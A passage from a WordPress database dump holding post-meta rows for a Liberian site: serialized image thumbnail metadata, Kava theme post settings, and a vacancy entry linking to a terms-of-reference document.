}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15950;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38013;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42472;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58428;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:22:\"NUGA-PIC-1075x650.jpeg\";s:5:\"width\";i:1075;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140227;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61183;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:21:\"NUGA-PIC-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81698;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:22:\"NUGA-PIC-1075x640.jpeg\";s:5:\"width\";i:1075;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140255;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37682,5582,'_wp_old_date','2025-08-20'),(37683,5582,'_thumbnail_id','5583'),(37684,5582,'_edit_last','38'),(37685,5582,'kava_extra_enable_breadcrumbs','inherit'),(37686,5582,'post_formats',''),(37687,5582,'gallery_tab',''),(37688,5582,'kava_extra_gallery_images',''),(37689,5582,'link_tab',''),(37690,5582,'kava_extra_link',''),(37691,5582,'kava_extra_link_target','_blank'),(37692,5582,'quote_tab',''),(37693,5582,'kava_extra_quote_text',''),(37694,5582,'kava_extra_quote_cite',''),(37695,5582,'audio_tab',''),(37696,5582,'kava_extra_audio',''),(37697,5582,'kava_extra_audio_loop','false'),(37698,5582,'kava_extra_audio_autoplay','false'),(37699,5582,'kava_extra_audio_preload','false'),(37700,5582,'video_tab',''),(37701,5582,'kava_extra_video_type','library'),(37702,5582,'kava_extra_video_library',''),(37703,5582,'kava_extra_video_external',''),(37704,5582,'kava_extra_video_poster',''),(37705,5582,'kava_extra_video_width','770'),(37706,5582,'kava_extra_video_height','480'),(37707,5582,'kava_extra_video_loop','false'),(37708,5582,'kava_extra_video_autoplay','false'),(37709,5582,'kava_extra_video_preload','false'),(37710,5585,'_edit_lock','1755666439:38'),(37711,5585,'_last_editor_used_jetpack','block-editor'),(37712,5586,'_wp_attached_file','2025/08/EPA-STAFF.jpeg'),(37713,5586,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:22:\"2025/08/EPA-STAFF.jpeg\";s:8:\"filesize\";i:173537;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20575;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"EPA-STAFF-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142496;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8112;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92670;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28169;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"EPA-STAFF-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6080;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15680;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37885;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39568;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60432;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"EPA-STAFF-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149913;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62888;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"EPA-STAFF-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80512;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:23:\"EPA-STAFF-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159240;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37716,5585,'_wp_old_date','2025-08-20'),(37717,5585,'_thumbnail_id','5586'),(37718,5585,'_edit_last','38'),(37719,5585,'kava_extra_enable_breadcrumbs','inherit'),(37720,5585,'post_formats',''),(37721,5585,'gallery_tab',''),(37722,5585,'kava_extra_gallery_images',''),(37723,5585,'link_tab',''),(37724,5585,'kava_extra_link',''),(37725,5585,'kava_extra_link_target','_blank'),(37726,5585,'quote_tab',''),(37727,5585,'kava_extra_quote_text',''),(37728,5585,'kava_extra_quote_cite',''),(37729,5585,'audio_tab',''),(37730,5585,'kava_extra_audio',''),(37731,5585,'kava_extra_audio_loop','false'),(37732,5585,'kava_extra_audio_autoplay','false'),(37733,5585,'kava_extra_audio_preload','false'),(37734,5585,'video_tab',''),(37735,5585,'kava_extra_video_type','library'),(37736,5585,'kava_extra_video_library',''),(37737,5585,'kava_extra_video_external',''),(37738,5585,'kava_extra_video_poster',''),(37739,5585,'kava_extra_video_width','770'),(37740,5585,'kava_extra_video_height','480'),(37741,5585,'kava_extra_video_loop','false'),(37742,5585,'kava_extra_video_autoplay','false'),(37743,5585,'kava_extra_video_preload','false'),(37744,5588,'_last_editor_used_jetpack','classic-editor'),(37745,5588,'_edit_lock','1755666898:38'),(37746,5588,'_edit_last','38'),(37747,5588,'_wp_page_template','default'),(37748,5588,'closed_date','2025-08-28'),(37749,5588,'owner','EPA'),(37750,5588,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2025/08/Terms-of-Reference-BTR2-BTR3NC4s-PIP.docx'),(37751,5590,'_wp_attached_file','2025/08/Terms-of-Reference-BTR2-BTR3NC4s-PIP.docx'),(37752,5590,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:65192;}'),(37753,5593,'_edit_lock','1756324043:38'),(37754,5593,'_last_editor_used_jetpack','block-editor'),(37755,5594,'_wp_attached_file','2025/08/526092425_1228871735948750_1851029490238126941_n.jpg'),(37756,5594,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:60:\"2025/08/526092425_1228871735948750_1851029490238126941_n.jpg\";s:8:\"filesize\";i:471624;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14718;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"526092425_1228871735948750_1851029490238126941_n-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108317;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6217;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67291;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"526092425_1228871735948750_1851029490238126941_n-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196851;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19676;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:59:\"526092425_1228871735948750_1851029490238126941_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3993;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11717;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27785;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30438;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43562;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:61:\"526092425_1228871735948750_1851029490238126941_n-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94797;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:62:\"526092425_1228871735948750_1851029490238126941_n-1920x1080.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197313;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45334;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:60:\"526092425_1228871735948750_1851029490238126941_n-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59763;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:61:\"526092425_1228871735948750_1851029490238126941_n-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96450;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37759,5593,'_wp_old_date','2025-08-27'),(37760,5593,'_thumbnail_id','5594'),(37761,5593,'_edit_last','38'),(37762,5593,'kava_extra_enable_breadcrumbs','inherit'),(37763,5593,'post_formats',''),(37764,5593,'gallery_tab',''),(37765,5593,'kava_extra_gallery_images',''),(37766,5593,'link_tab',''),(37767,5593,'kava_extra_link',''),(37768,5593,'kava_extra_link_target','_blank'),(37769,5593,'quote_tab',''),(37770,5593,'kava_extra_quote_text',''),(37771,5593,'kava_extra_quote_cite',''),(37772,5593,'audio_tab',''),(37773,5593,'kava_extra_audio',''),(37774,5593,'kava_extra_audio_loop','false'),(37775,5593,'kava_extra_audio_autoplay','false'),(37776,5593,'kava_extra_audio_preload','false'),(37777,5593,'video_tab',''),(37778,5593,'kava_extra_video_type','library'),(37779,5593,'kava_extra_video_library',''),(37780,5593,'kava_extra_video_external',''),(37781,5593,'kava_extra_video_poster',''),(37782,5593,'kava_extra_video_width','770'),(37783,5593,'kava_extra_video_height','480'),(37784,5593,'kava_extra_video_loop','false'),(37785,5593,'kava_extra_video_autoplay','false'),(37786,5593,'kava_extra_video_preload','false'),(37791,5598,'_edit_lock','1756726909:38'),(37792,5598,'_last_editor_used_jetpack','block-editor'),(37793,5599,'_wp_attached_file','2025/08/CBIT-PHOTO.jpg'),(37794,5599,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:22:\"2025/08/CBIT-PHOTO.jpg\";s:8:\"filesize\";i:248814;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17213;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"CBIT-PHOTO-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131033;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6795;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81441;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"CBIT-PHOTO-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247198;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23211;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:21:\"CBIT-PHOTO-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4680;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13328;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33540;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35611;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51861;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"CBIT-PHOTO-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122764;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:24:\"CBIT-PHOTO-1600x1080.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:255272;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54196;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"CBIT-PHOTO-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72358;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:23:\"CBIT-PHOTO-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129200;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37797,5598,'_wp_old_date','2025-08-29'),(37798,5598,'_thumbnail_id','5604'),(37799,5598,'_edit_last','38'),(37800,5598,'kava_extra_enable_breadcrumbs','inherit'),(37801,5598,'post_formats',''),(37802,5598,'gallery_tab',''),(37803,5598,'kava_extra_gallery_images',''),(37804,5598,'link_tab',''),(37805,5598,'kava_extra_link',''),(37806,5598,'kava_extra_link_target','_blank'),(37807,5598,'quote_tab',''),(37808,5598,'kava_extra_quote_text',''),(37809,5598,'kava_extra_quote_cite',''),(37810,5598,'audio_tab',''),(37811,5598,'kava_extra_audio',''),(37812,5598,'kava_extra_audio_loop','false'),(37813,5598,'kava_extra_audio_autoplay','false'),(37814,5598,'kava_extra_audio_preload','false'),(37815,5598,'video_tab',''),(37816,5598,'kava_extra_video_type','library'),(37817,5598,'kava_extra_video_library',''),(37818,5598,'kava_extra_video_external',''),(37819,5598,'kava_extra_video_poster',''),(37820,5598,'kava_extra_video_width','770'),(37821,5598,'kava_extra_video_height','480'),(37822,5598,'kava_extra_video_loop','false'),(37823,5598,'kava_extra_video_autoplay','false'),(37824,5598,'kava_extra_video_preload','false'),(37825,5601,'_edit_lock','1756478835:38'),(37826,5601,'_last_editor_used_jetpack','block-editor'),(37827,5602,'_wp_attached_file','2025/08/project.jpg'),(37828,5602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:504;s:6:\"height\";i:504;s:4:\"file\";s:19:\"2025/08/project.jpg\";s:8:\"filesize\";i:54160;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"project-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30113;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"project-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10083;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"project-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32592;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:18:\"project-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6845;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:19:\"project-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19912;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:19:\"project-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45823;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:19:\"project-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48277;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:19:\"project-504x450.jpg\";s:5:\"width\";i:504;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63814;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37831,5601,'_wp_old_date','2025-08-29'),(37832,5601,'_thumbnail_id','5602'),(37833,5601,'_edit_last','38'),(37834,5601,'kava_extra_enable_breadcrumbs','inherit'),(37835,5601,'post_formats',''),(37836,5601,'gallery_tab',''),(37837,5601,'kava_extra_gallery_images',''),(37838,5601,'link_tab',''),(37839,5601,'kava_extra_link',''),(37840,5601,'kava_extra_link_target','_blank'),(37841,5601,'quote_tab',''),(37842,5601,'kava_extra_quote_text',''),(37843,5601,'kava_extra_quote_cite',''),(37844,5601,'audio_tab',''),(37845,5601,'kava_extra_audio',''),(37846,5601,'kava_extra_audio_loop','false'),(37847,5601,'kava_extra_audio_autoplay','false'),(37848,5601,'kava_extra_audio_preload','false'),(37849,5601,'video_tab',''),(37850,5601,'kava_extra_video_type','library'),(37851,5601,'kava_extra_video_library',''),(37852,5601,'kava_extra_video_external',''),(37853,5601,'kava_extra_video_poster',''),(37854,5601,'kava_extra_video_width','770'),(37855,5601,'kava_extra_video_height','480'),(37856,5601,'kava_extra_video_loop','false'),(37857,5601,'kava_extra_video_autoplay','false'),(37858,5601,'kava_extra_video_preload','false'),(37859,5604,'_wp_attached_file','2025/08/GH.jpg'),(37860,5604,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:14:\"2025/08/GH.jpg\";s:8:\"filesize\";i:163936;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:14:\"GH-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19047;}s:5:\"large\";a:5:{s:4:\"file\";s:15:\"GH-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"GH-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7738;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:14:\"GH-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88132;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:14:\"GH-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26214;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:13:\"GH-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5581;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:14:\"GH-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15034;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:14:\"GH-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36836;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:14:\"GH-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40870;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:14:\"GH-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56768;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:15:\"GH-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:142429;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:14:\"GH-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59176;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:14:\"GH-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78864;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:15:\"GH-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:158184;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\"